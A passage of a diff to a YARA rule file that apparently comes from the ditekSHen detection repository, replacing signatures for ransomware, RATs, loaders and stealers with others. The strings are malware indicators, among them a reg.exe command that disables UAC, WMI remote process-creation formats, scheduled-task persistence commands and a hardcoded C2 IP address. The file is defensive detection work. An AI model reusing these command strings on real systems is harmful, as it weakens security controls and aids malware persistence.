1.0 Made in Belarus." fullword ascii - $s2 = "! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]" fullword ascii + $s1 = "Dear %s" fullword wide + $s2 = "\\??\\UNC\\%s\\%s\\" wide + $s3 = "\\\\%ws\\admin$\\%ws" wide + $s4 = "%s /node:\"%ws\" /user:\"%ws\" /password:" wide + $s5 = "process call create" wide + $s6 = ">----===Zeoticus" ascii + $s7 = "ZEOTICUSV2" ascii + $s8 = "GetExtendedTcpTable" fullword ascii + $s9 = "SHAMROckSWTF" ascii + $s10 = "NTDLL.RtlAllocateHeap" fullword ascii + $s11 = ".pandora" fullword wide + $s12 = { 70 00 20 00 72 00 20 00 69 00 20 00 76 00 20 00 65 00 20 00 74 } + $pdb = "_cryptor\\shell_gen\\Release\\" ascii condition: - uint16(0)==0x5a4d and all of them + uint16(0)==0x5a4d and (6 of ($s*) or ($pdb)) } import "pe" -rule DITEKSHEN_MALWARE_Linux_Hellokitty : FILE +rule DITEKSHEN_MALWARE_Win_Dlagent11 : FILE { meta: - description = "Detects Linux version of HelloKitty ransomware" + description = "Detects downloader agent" author = "ditekSHen" - id = "bb228937-8cd8-5fb8-aaed-3bd539ae96f2" - date = "2024-09-06" - modified = "2024-09-06" + id = "c8bf9b1a-4ec1-5291-a334-82c79980ef53" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L7722-L7746" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "bcb1188d616b29fa535e757a37476435a3061d27e143339413f6829876701868" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L5551-L5564" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "61df4855766050237c0b67bf70684020beb5d88f5928fa2814077e505be938a6" score = 75 - quality = 73 + quality = 75 tags = "FILE" strings: - $s1 = "exec_pipe:%s" ascii - $s2 = "Error InitAPI !!!" fullword ascii - $s3 = "No Files Found !!!" fullword ascii - $s4 = "Error open log File:%s" fullword ascii - $s5 = "%ld - Files Found " fullword ascii - $s6 = "Total VM run on host:" fullword ascii - $s7 = "error:%d open:%s" fullword ascii - $s8 = "work.log" fullword ascii - $s9 = "esxcli vm process kill" ascii - $s10 = "readdir64" fullword ascii - $s11 = "%s_%d.block" fullword ascii - $s12 = "EVP_EncryptFinal_ex" fullword ascii - $s13 = ".README_TO_RESTORE" fullword ascii - $m1 = "COMPROMISED AND YOUR SENSITIVE PRIVATE INFORMATION WAS STOLEN" ascii nocase - $m2 = "damage them without special software" ascii nocase - $m3 = "leaking or being sold" ascii nocase - $m4 = "Data will be Published and/or Sold" ascii nocase + $pdb = "\\loader2\\obj\\Debug\\loader2.pdb" ascii + $s1 = "DownloadFile" fullword ascii + $s2 = "ZipFile" fullword ascii + $s3 = "WebClient" fullword ascii + $s4 = "ExtractToDirectory" fullword ascii + $s5 = "System Clear" fullword ascii condition: - uint16(0)==0x457f and (6 of ($s*) or (2 of ($m*) and 2 of ($s*)) or 8 of them ) + uint16(0)==0x5a4d and ( all of ($s*) or (($pdb) and 4 of ($s*))) } import "pe" -rule DITEKSHEN_MALWARE_Win_Blackmatter : FILE +rule DITEKSHEN_MALWARE_Win_Softcnapp : FILE { meta: - description = "Detects BlackMatter ransomware" + description = "Detects SoftCNApp" author = "ditekSHen" - id = "8883e652-edab-5cbf-a4fa-963b437447d9" - date = "2024-09-06" - modified = "2024-09-06" + id = "473442e2-d411-5e2b-948e-c7ce034a5810" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L7748-L7767" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "4558002b424f7102f67fc44dfc37ac20f6013e25ae827c6aee0fc37231e2fa72" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L5566-L5583" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "2d7f4320282218842fa2e82906bcaf691610ad1a6ea257a2a9fc9e062229a2e8" score = 75 quality = 75 tags = "FILE" strings: - $s1 = "C:\\Windows\\System32\\*.drv" fullword wide - $s2 = "NYbr-Vk@" fullword ascii - $s3 = ":7:=:H:Q:W:\\:b:&;O;^;v;" fullword ascii - $o1 = { b0 34 aa fe c0 e2 fb b9 03 } - $o2 = { fe 00 ff 75 08 ff 75 0c ff b5 d8 fe ff ff ff b5 } - $o3 = { 6a 00 ff 75 0c ff b5 d8 fe ff ff ff b5 dc fe ff } - $o4 = { ff 75 08 ff 75 0c ff b5 d8 fe ff ff ff b5 dc fe } - $o5 = { 53 56 57 8d 85 70 ff ff ff 83 c0 0f 83 e0 f0 89 } - $o6 = { c7 85 68 ff ff ff 00 04 00 00 8b 85 6c ff ff ff } + $s1 = "\\\\.\\PIPE\\SOC%d" fullword ascii + $s2 = "Mozilla/5.0 (Windows NT 6.1)" fullword ascii + $s3 = "Param: sl=%d; sl=%d; sl=%d; sl=%d; sl=%d;" fullword ascii + $s4 = ".?AVCHPPlugin@@" fullword ascii + $s5 = ".?AVCHPCmd@@" fullword ascii + $s6 = ".?AVCHPExplorer@@" fullword ascii + $s7 = "%s\\svchost.exe -O" fullword wide + $s8 = "\"%s\\%s\" -P" fullword ascii + $n1 = "45.63.58.34" fullword ascii + $n2 = "127.0.0.1" fullword ascii condition: - uint16(0)==0x5a4d and ( all of ($s*) and all of ($o*)) + uint16(0)==0x5a4d and (4 of ($s*) or ( all of ($n*) and 2 of ($s*))) } import "pe" -rule DITEKSHEN_MALWARE_Win_Dlinjector04 : FILE +rule DITEKSHEN_MALWARE_Win_Covenantgruntstager : FILE { meta: - description = "Detects downloader / injector" + description = "Detects Covenant Grunt Stager" author = "ditekSHen" - id = "fe423aee-6ff4-5fd0-9fa2-51dd0c27f54b" - date = "2024-09-06" - modified = "2024-09-06" + id = "61495541-ed9c-5227-aa50-cbaeacfb20a2" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L7769-L7790" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "ab9a047e53dec2cc5986522636783b5cb8aae7fc0297292d017ec22ee5750cce" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L5585-L5606" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "638f63f605b21154f062b0f4d0659cd6cd87aee319debb2c1a991a679fec087a" score = 75 quality = 75 tags = "FILE" strings: - $s1 = "Runner" fullword ascii - $s2 = "DownloadPayload" fullword ascii - $s3 = "RunOnStartup" fullword ascii - $a1 = "Antis" fullword ascii - $a2 = "antiVM" fullword ascii - $a3 = "antiSandbox" fullword ascii - $a4 = "antiDebug" fullword ascii - $a5 = "antiEmulator" fullword ascii - $a6 = "enablePersistence" fullword ascii - $a7 = "enableFakeError" fullword ascii - $a8 = "DetectVirtualMachine" fullword ascii - $a9 = "DetectSandboxie" fullword ascii - $a10 = "DetectDebugger" fullword ascii - $a11 = "CheckEmulator" fullword ascii + $x1 = "VXNlci1BZ2VudA" ascii wide + $x2 = "cGFnZT17R1VJRH0mdj0x" ascii wide + $x3 = "0eXBlPXtHVUlEfSZ2PTE" ascii wide + $x4 = "tZXNzYWdlPXtHVUlEfSZ2PTE" ascii wide + $x5 = "L2VuLXVzL" ascii wide + $x6 = "L2VuLXVzL2luZGV4Lmh0bWw" ascii wide + $x7 = "L2VuLXVzL2RvY3MuaHRtbD" ascii wide + $s1 = "ExecuteStager" ascii + $s2 = "UseCertPinning" fullword ascii + $s3 = "FromBase64String" fullword ascii + $s4 = "ToBase64String" fullword ascii + $s5 = "DownloadString" fullword ascii + $s6 = "UploadString" fullword ascii + $s7 = "GetWebRequest" fullword ascii condition: - uint16(0)==0x5a4d and (( all of ($s*) and 5 of ($a*)) or 10 of ($a*)) + uint16(0)==0x5a4d and (2 of ($x*) or all of ($s*) or (1 of ($x*) and 5 of ($s*))) } import "pe" -rule DITEKSHEN_MALWARE_Win_Darkcomet : FILE +rule DITEKSHEN_MALWARE_Win_Fabookie : FILE { meta: - description = "Detects DarkComet" + description = "Detects Fabookie / ElysiumStealer" author = "ditekSHen" - id = "ae2412df-adae-5640-9404-7b093c5095b4" - date = "2024-09-06" - modified = "2024-09-06" + id = "dfa653c4-37d9-5e31-9c47-23adf751e4aa" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L7792-L7812" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "444df3c914c47500018614af10036864b459e7873daf079b684352dbe52f0486" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L5608-L5624" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "bbe10323817d501a361a33abf61a49ad59fcac69d78d9d9ec1744ee99a4b4629" score = 75 - quality = 50 + quality = 73 tags = "FILE" strings: - $s1 = "%s, ClassID: %s" ascii - $s2 = "%s, ProgID: \"%s\"" ascii - $s3 = "#KCMDDC51#" ascii - $s4 = "#BOT#VisitUrl" ascii - $s5 = "#BOT#OpenUrl" ascii - $s6 = "#BOT#Ping" ascii - $s7 = "#BOT#RunPrompt" ascii - $s8 = "#BOT#CloseServer" ascii - $s9 = "#BOT#SvrUninstall" ascii - $s10 = "#BOT#URLUpdate" ascii - $s11 = "#BOT#URLDownload" ascii - $s12 = /BTRESULT(Close|Download|HTTP|Mass|Open|Ping\|Respond|Run|Syn|UDP|Uninstall\|uninstall|Update|Visit)/ ascii - $s13 = "dclogs\\" fullword ascii + $s1 = "rwinssyslog" fullword wide + $s2 = "_kasssperskdy" fullword wide + $s3 = "[Title:%s]" fullword wide + $s4 = "[Execute]" fullword wide + $s5 = "[Snapshot]" fullword wide + $s6 = "Mozilla/4.0 (compatible)" fullword wide + $s7 = "d-k netsvcs" fullword wide + $s8 = "facebook.websmails.com" fullword wide + $s9 = "CUdpClient::Start" fullword ascii condition: - uint16(0)==0x5a4d and 4 of them + ( uint16(0)==0x5a4d or uint16(0)==0x0805) and 6 of them } import "pe" -rule DITEKSHEN_MALWARE_Win_Macoute : FILE +rule DITEKSHEN_MALWARE_Win_Cobianrat : FILE { meta: - description = "Detects Macoute" + description = "Detects CobianRAT, a fork of Njrat" author = "ditekSHen" - id = "0ecfb923-2e51-544e-984d-efdeeb175727" - date = "2024-09-06" - modified = "2024-09-06" + id = "5a9b6f04-fc52-52a9-b72f-d24dd093e886" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L7814-L7836" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "1dffa48fe6c0ac053509b5f5994d323fd72d090da0f077b52c9bc33df6997964" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L5626-L5640" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "5c8f55e5328b61c3591c876797b4521f8e98af7a6c53bab918f10d5c3c2b5013" score = 75 quality = 75 tags = "FILE" strings: - $s1 = "scp%s%s%s%s" ascii - $s2 = "putfile %s %s" ascii - $s3 = "pscp|%s|%s:%s" ascii - $s4 = "connect %host %port\\n" ascii - $s5 = "/ecoute/spool/%s-%lu" ascii - $s6 = "<f n=\"%s\" s=\"%lu\" d=\"%d-%d-%d\"/>" ascii - $s7 = "CMPT;%s;%s;%s;%s;%s" ascii - $s8 = "%s\\apoScreen%lu.dll" ascii - $s9 = "/cap/%s%lu.jpg" ascii - $s10 = "INFO;%u;%u;%u;%d;%d;%d;%d;%d;%d;%d;%s" ascii - $s11 = "SUBJECT: %s is comming!" ascii - $s12 = "Content-type: multipart/mixed; boundary=\"#BOUNDARY#\"" ascii - $s13 = "FROM: %s@yahoo.com" ascii - $s14 = "<html><script language=\"JavaScript\">window.open(\"readme.eml\", null,\"resizable=no,top=6000,left=6000\")</script></html>" ascii - $s15 = "<html><HEAD></HEAD><body bgColor=3D#ffffff><iframe src=3Dcid:THE-CID height=3D0 width=3D0></iframe></body></html>" ascii + $s1 = "1.0.40.7" fullword wide + $s2 = "DownloadData" fullword wide + $s3 = "Executed As" fullword wide + $s4 = "\\Plugins" fullword wide + $s5 = "LOGIN" fullword wide + $s6 = "software\\microsoft\\windows\\currentversion\\run" wide + $s7 = "Hidden" fullword wide condition: - uint16(0)==0x5a4d and 10 of them + uint16(0)==0x5a4d and 5 of them } import "pe" -rule DITEKSHEN_MALWARE_Win_Coinminer04 : FILE +rule DITEKSHEN_MALWARE_Win_Leivion : FILE { meta: - description = "Detects coinmining malware" + description = "Detects Leivion" author = "ditekSHen" - id = "d90d8ad3-20b7-5bb4-8c58-3488c60ed9a2" - date = "2024-09-06" - modified = "2024-09-06" + id = "77800add-8fff-5657-9ed6-a23517bce0b1" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L7838-L7858" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "2ef60dbf0bac3d5910635bb011a45e5ebc1392094b10425604fa9dd290198f8b" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L5660-L5673" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "a0cda23df4301b66feedad7c04b4d051c07474ccaa07c05598dd0b47bb6fc7e6" score = 75 quality = 75 tags = "FILE" strings: - $s1 = "createDll" fullword ascii - $s2 = "getTasks" fullword ascii - $s3 = "SetStartup" fullword ascii - $s4 = "loadUrl" fullword ascii - $s5 = "Processer" fullword ascii - $s6 = "checkProcess" fullword ascii - $s7 = "runProcess" fullword ascii - $s8 = "createDir" fullword ascii - $cnc1 = "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0" fullword wide - $cnc2 = "?hwid=" fullword wide - $cnc3 = "?timeout=1" fullword wide - $cnc4 = "&completed=" fullword wide - $cnc5 = "/cmd.php" wide + $s1 = "/var/lib/veil/go/src/runtime/mem_windows.go" fullword ascii + $s2 = "/var/lib/veil/go/src/internal/singleflight/singleflight.go" fullword ascii + $s3 = "/var/lib/veil/go/src/net/http/sniff.go" fullword ascii + $s4 = "/var/lib/veil/go/src/net/sendfile_windows.go" fullword ascii + $s5 = "/var/lib/veil/go/src/os/exec_" ascii + $s6 = "/var/lib/veil/go/src/runtime/mgcsweep.go" fullword ascii condition: - uint16(0)==0x5a4d and (5 of ($s*) and 1 of ($cnc*)) + uint16(0)==0x5a4d and 4 of them } import "pe" -rule DITEKSHEN_MALWARE_Win_Sidewalk : FILE +rule DITEKSHEN_MALWARE_Win_Banload : FILE { meta: - description = "Detects SideWalk" + description = "Detects Banload" author = "ditekSHen" - id = "ab82b83a-a279-555a-83c2-6340431b10da" - date = "2024-09-06" - modified = "2024-09-06" + id = "4672bce1-1280-576d-b7df-f0181a854058" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L7860-L7880" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "6885a1ad69d61fa5875ee0db949071e84390fc2db4307c412b32cd17c0806f6a" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L5675-L5688" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "5cbc69d11b73f60d6eee3f23ed6cc217ba37a3408cb69e396e0394b5a1e20b75" score = 75 quality = 75 tags = "FILE" strings: - $s1 = "Decommit" fullword ascii - $s2 = "Shellc0deRunner" fullword ascii - $s3 = "shellc0de" fullword ascii - $s4 = "C:\\Windows\\System32\\msdt.exe" fullword wide - $s5 = "StartProcessWOPid" fullword ascii - $s6 = "StartProcessWithParent" fullword ascii - $m1 = "alloctype" fullword ascii - $m2 = "ThreadIoPriority" fullword ascii - $m3 = "PebAddress" fullword ascii - $m4 = "dotnet.4.x64.dll" fullword wide - $m5 = "LogonNetCredentialsOnly" fullword ascii - $m6 = "ThreadIdealProcessor" fullword ascii - $m7 = "LogonWithProfile" fullword ascii + $s1 = "main.die" fullword ascii + $s2 = "main.postResults" fullword ascii + $s3 = "main.checkin" fullword ascii + $s4 = "RegQueryValueExWRemoveDirectoryWSETTINGS_TIMEOUTTerminateProcessUpgrade RequiredUser-Agent: %s" ascii + $s5 = "pcuser-agentws2_32.dll (targetpc= DigestType ErrCode=%v" ascii + $s6 = "invalid pc-encoded table f=runtime: invalid typeBitsBulkBarrie" fullword ascii condition: - uint16(0)==0x5a4d and (5 of ($s*) or all of ($m*) or (11 of them )) + uint16(0)==0x5a4d and 5 of them } import "pe" -rule DITEKSHEN_MALWARE_Win_Vanillarat : FILE +rule DITEKSHEN_MALWARE_Win_TYRAT : FILE { meta: - description = "Detects VanillaRAT" + description = "Detects TYRAT" author = "ditekSHen" - id = "70c2cd1a-a6d4-562e-a6fc-c16a9e87c6b7" - date = "2024-09-06" - modified = "2024-09-06" + id = "316c50cc-964e-5d24-b169-7a09fdf61638" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L7882-L7902" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "d7b90ac88a50693ec4bb0676c04f5d161f04f67970ea60d80e79d774da75bfdc" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L5690-L5703" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "b733b7aa3ba1195807fb728453c0f3f4df2177836054af6f7a863e14058884cb" score = 75 - quality = 75 + quality = 25 tags = "FILE" strings: - $stub = "VanillaStub." ascii wide - $s1 = "Client.Send: " wide - $s2 = "Connected to chat" fullword wide - $s3 = "GetStoredPasswords" fullword wide - $s4 = "Started screen locker." fullword wide - $s5 = "[<\\MOUSE>]" fullword wide - $s6 = "YOUR SCREEN HAS BEEN LOCKED!" fullword wide - $s7 = "record recsound" fullword wide - $f1 = "<StartRemoteDestkop>d__" ascii - $f2 = "<ConnectLoop>d__" ascii - $f3 = "<Scan0>k__" ascii - $f4 = "<RemoteShellActive>k__" ascii - $f5 = "KillClient" fullword ascii + $s1 = "C:\\$MSIRecycle.Bin\\" fullword ascii + $s2 = "Range: bytes=%d-" fullword ascii + $s3 = "GET%sHTTP/1.1" fullword ascii + $s4 = "DllServer.dll" fullword ascii + $s5 = ".Bin\\bnch" ascii + $s6 = "User-Agent: wget" fullword ascii condition: - uint16(0)==0x5a4d and (($stub and (2 of ($s*) or 2 of ($f*))) or 6 of ($s*) or all of ($f*)) + uint16(0)==0x5a4d and 4 of them } import "pe" -rule DITEKSHEN_MALWARE_Win_Sectoprat : FILE +rule DITEKSHEN_MALWARE_Win_Infinitylock : FILE { meta: - description = "Detects SectopRAT" + description = "Detects InfinityLock ransomware" author = "ditekSHen" - id = "d6594834-24d7-5e86-84b5-5a7920e7bc89" - date = "2024-09-06" - modified = "2024-09-06" + id = "7a66cc19-c635-580b-abc2-b58bd48673bd" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L7904-L7929" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "b4048f837c02560a8b650247173be25893b466e5cec8f2784eea58172f973822" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L5705-L5723" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "634759f1c2d48becebc9c87e146e898524071738f74b7001b112dc793bcb581c" score = 75 - quality = 75 + quality = 73 tags = "FILE" strings: - $s1 = "\\\\.\\root\\cimv2:Win32_Process" wide - $s2 = "\\\\.\\root\\cimv2:CIM_DataFile.Name=" wide - $s3 = "^.*(?=Windows)" fullword wide - $s4 = "C:\\Windows\\System32\\cmd.exe" wide - $s5 = "C:\\Windows\\explorer.exe" wide - $s6 = "Disabling IE protection" wide - $s7 = "stream started succces" wide - $b1 = "/C start Firefox" wide - $b2 = "/C start chrome" wide - $b3 = "/C start iexplore" wide - $m1 = "DefWindowProc" fullword ascii - $m2 = "AuthStream" fullword ascii - $m3 = "KillBrowsers" fullword ascii - $m4 = "GetAllNetworkInterfaces" fullword ascii - $m5 = "EnumDisplayDevices" fullword ascii - $m6 = "RemoteClient.Packets" fullword ascii - $m7 = "IServerPacket" fullword ascii - $m8 = "keybd_event" fullword ascii + $s1 = "_Encrypted$" fullword ascii + $s2 = "PublicKeyToken=" fullword ascii nocase + $s3 = "GenerateHWID" fullword ascii + $s4 = "CreateKey" fullword ascii + $d1 = "ProgrammFiles" fullword ascii + $d2 = "OneDrive" fullword ascii + $d3 = "ProgrammsX86" fullword ascii + $d4 = "UserDirs" fullword ascii + $d5 = "B_Drive" fullword ascii + $pdb1 = "F:\\DESKTOP!\\ChkDsk\\ChkDsk\\obj\\" ascii + $pdb2 = "\\ChkDsk\\obj\\Debug\\PremiereCrack.pdb" ascii condition: - uint16(0)==0x5a4d and ((5 of ($s*) and 2 of ($b*)) or all of ($s*) or ( all of ($b*) and (4 of ($s*) or 5 of ($m*)))) + uint16(0)==0x5a4d and (( all of ($s*) and 1 of ($d*)) or (4 of ($d*) and 2 of ($s*)) or ( any of ($pdb*) and 1 of ($s*) and 1 of ($d*))) } import "pe" -rule DITEKSHEN_MALWARE_Win_Neptune : FILE +rule DITEKSHEN_MALWARE_Win_Mountlocker : FILE { meta: - description = "Detects Neptune keylogger / infostealer" + description = "Detects MountLocker ransomware" author = "ditekSHen" - id = "0f619bea-f00b-5078-95a4-83306e3e87b4" - date = "2024-09-06" - modified = "2024-09-06" + id = "0590d08d-1ee8-5dfe-af12-15b149acd2d6" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L7931-L7953" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "e3298bf55f89180ed7e9f7ad35b59d39284a5143fd69fa2a4fbc27d91fb2fbd3" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L5725-L5740" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "30bc601fef60cc1c9d8bff5dd3f8a53214f088b74eb24fe2369f5664613e0eaf" score = 75 quality = 75 tags = "FILE" strings: - $x1 = "your keylogger has been freshly installed on" wide - $x2 = "Attached is a screenshot of the victim" wide - $x3 = "color: rgb(2, 84, 138);'>Project Neptune</span><br>" wide - $x4 = ">{Monitor Everything}</span><br><br>" wide - $x5 = "[First Run] Neptune" wide - $x6 = "Neptune - " wide - $s1 = "Melt" fullword wide - $s2 = "Hide" fullword wide - $s3 = "SDDate+" fullword wide - $s4 = "DelOff+" fullword wide - $s5 = "MsgFalse+" fullword wide - $s6 = "Clipboard:" fullword wide - $s7 = "information is valid and working!" wide - $s8 = ".exe /k %windir%\\System32\\reg.exe ADD HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v EnableLUA /t REG_DWORD /d 0 /f" wide - $s9 = "http://www.exampleserver.com/directfile.exe" fullword wide + $s1 = "] locker.dir.check > " ascii wide + $s2 = "] locekr.kill." ascii wide + $s3 = "] locker.worm" ascii wide + $s4 = "%CLIENT_ID%" fullword ascii + $s5 = "RecoveryManual.html" ascii wide + $s6 = "RECOVERY MANUAL" ascii + $s7 = ".ReadManual.%0.8X" ascii wide + $s8 = "/?cid=%CLIENT_ID%" ascii condition: - uint16(0)==0x5a4d and (2 of ($x*) or 7 of ($s*) or (1 of ($x*) and 5 of ($s*))) + uint16(0)==0x5a4d and 3 of them } import "pe" -rule DITEKSHEN_MALWARE_Win_Tomiris : FILE +rule DITEKSHEN_MALWARE_Win_Pingback : FILE { meta: - description = "Detects Tomiris" + description = "Detects PingBack ICMP backdoor" author = "ditekSHen" - id = "86efd4fb-3c76-504e-b367-132aee59e09a" - date = "2024-09-06" - modified = "2024-09-06" + id = "ecb313b6-f923-5b6d-a4d7-a4650817ed84" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L7955-L7978" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "1d9baeb6db2e849dd053c3fc735984e23b9cead39cf166f8a544ee5a439185d1" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L5742-L5761" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "c5fa9ecefca1188ba5e81c0518f74023884ad0f66718fc030601cb458bdf2f12" score = 75 quality = 75 tags = "FILE" strings: - $f1 = "main.workPath" ascii - $f2 = "main.selfName" ascii - $f3 = "main.infoServerAddr" ascii - $f4 = "main.configFileName" ascii - $s1 = "C:/Projects/go/src/Tomiris/main.go" ascii - $s2 = "C:/GO/go1.16.2/src/os/user/lookup_windows.go" ascii - $s3 = "C:\\GO\\go1.16.2" ascii - $s4 = ".html.jpeg.json.wasm.webp/p/gf/p/kk1562515" ascii - $s5 = "\" /ST 10:00alarm clockassistQueueavx512vbmi2avx512vnniwbad" ascii - $s6 = "write /TR \" Value addr= alloc base code= ctxt: curg= free goid jobs= list= m->p=" ascii - $t1 = "SCHTASKS /DELETE /F /TN \"%s\"" ascii - $t2 = "SCHTASKS /CREATE /SC DAILY /TN" ascii - $t3 = "SCHTASKS /CREATE /SC ONCE /TN \"%s\" /TR \"%s\" /ST %s" ascii - $t4 = "SCHTASKS /CREATE /SC ONCE /TN \"%s\" /TR \"'%s' %s\" /ST %s" ascii - $r1 = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Time Zones" ascii - $r2 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings" ascii + $s1 = "Sniffer ok!" fullword ascii + $s2 = "recv icmp packet!" fullword ascii + $s3 = "WSASocket() failed: %d" fullword ascii + $s4 = "file on remote computers success" ascii + $s5 = "listen port error!" fullword ascii + $s6 = "\\PingBackService" ascii + $c1 = "exec" fullword ascii + $c2 = "rexec" fullword ascii + $c3 = "exep" fullword ascii + $c4 = "download" fullword ascii + $c5 = "upload" fullword ascii + $c6 = "shell" fullword ascii condition: - uint16(0)==0x5a4d and (( all of ($f*) and 3 of ($s*) and 2 of ($t*) and 1 of ($r*)) or (4 of ($s*) and 2 of ($t*) and 1 of ($r*)) or 12 of them ) + uint16(0)==0x5a4d and (3 of ($s*) or all of ($c*) or (4 of ($c*) and 2 of ($s*))) } import "pe" -rule DITEKSHEN_MALWARE_Win_Jennlog : FILE +rule DITEKSHEN_MALWARE_Win_Bazarloader : FILE { meta: - description = "Detects JennLog loader" + description = "Detects BazarLoader variants" author = "ditekSHen" - id = "38f8cd13-f157-5cce-bf04-80c29d254144" - date = "2024-09-06" - modified = "2024-09-06" + id = "6282df59-7244-501f-bb60-09a2a519bd47" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = 